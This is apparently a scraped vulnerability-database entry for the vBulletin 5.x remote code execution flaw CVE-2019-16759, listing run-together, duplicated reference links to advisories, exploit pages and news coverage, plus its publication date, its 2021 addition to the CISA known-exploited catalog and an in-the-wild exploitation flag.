http://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/158829/vBulletin-5.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/158830/vBulletin-5.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/158866/vBulletin-5.x-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2020/Aug/5https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/https://seclists.org/fulldisclosure/2019/Sep/31https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/http://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/158829/vBulletin-5.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/158830/vBulletin-5.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/158866/vBulletin-5.x-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2020/Aug/5https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/https://seclists.org/fulldisclosure/2019/Sep/31https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-16759
2019-09-24
Published
2021-11-03
Added to CISA KEV
Exploited in the wild